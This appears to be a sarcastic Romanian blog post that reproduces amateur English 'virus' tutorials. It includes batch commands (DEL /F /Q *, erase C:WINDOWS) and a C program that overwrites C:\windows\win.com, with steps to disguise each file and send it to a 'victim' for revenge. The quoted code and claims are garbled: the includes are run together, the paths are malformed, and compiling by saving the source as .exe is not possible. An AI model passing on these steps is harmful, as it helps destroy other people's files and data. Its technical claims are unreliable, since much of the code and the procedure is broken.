Ce e in neregula cu poza de mai jos?
Dar cu aceasta captura?
Sursa: CBC
Pentru hacktarzi:
To delete all folders/files just put this:
DEL /F /Q *
Into notpad and save it as whateveryouwant.cmd
It will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something.
WARNING DO NOT CLICK ON IT WHEN YOU HAVE CREATED IT, IT WILL DESTROY YOUR COMPUTER
If you just want to delete the WINDOWS file do this:
The only thing you need again is Notepad.
Now, to test it, create a textfile called TEST.txt in C:
Now in your notepad type “erase C:TEST.txt” (without the quotes). Then do a “Save As…” and save it as “Test.cmd”.
Now run the file “Test.cmd” then open up C: and you’ll see your Test.txt is gone. Now, the real work begins:
Go to Notpad and type erase C:WINDOWS (or C:LINUX if you have linux) and save it again as whateveryouwant.cmd. Now DON’T run the file or you’ll lose your WINDOWS files. So, that’s the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX files are gone. And have to install LINUX/WINDOWS again.
Simple explanation:
Go to notepad, type erase C:WINDOWS, save as whateveryouwant.cmd send to victim, once the victim opens it, the WINDOWS file will be gone and have to install WINDOWS again.
Si inca o petarda:
type this in notepad
———————————————————————
// #include<iostream.h>
#include<conio.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sysstat.h>
#include <io.h>
#include <string.h>int main(void)
{
clrscr();
int handle;
char string[1000];
int length, res,i;/*
Create a file named “DOVE.GIF” in the current directory and write
a string to it. If “DOVE.GIF” already exists, it will be overwritten.
*/if ((handle = open(“C:\windows\win.com”, O_WRONLY | O_CREAT |
O_TRUNC,
S_IREAD | S_IWRITE)) == -1)
{
printf(“Error opening file.
“);
exit(1);
}strcpy(string, “<html>Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!</html>
“);length = strlen(string);
if ((res = write(handle, string, length)) != length)
{
printf(“Error writing to the file.
“);
getch();
exit(1);
}
printf(”Wrote %d bytes to the file.
“, res);
cout<<”Hello !!!!!!!!”;
cout<<”This is a VIRUS ATTACK !!!”;
cout<<”This execution currupt your WINDOWS !!!!!!
“;
close(handle);
getch();
return 0;
}————————————————————————-
just paste it in the notepad and save it as virus.exe
and send it to victim and scare the brains out of him
Incepem cu un anunt inflacarat (ca deh, Gary FiulSulii vine sa ne lamureasca online):
Va mai supun atentiei si o captura ce contine niste comentarii bine punctate la adresa unui articolas din sectiunea Think Outside the Box (?!):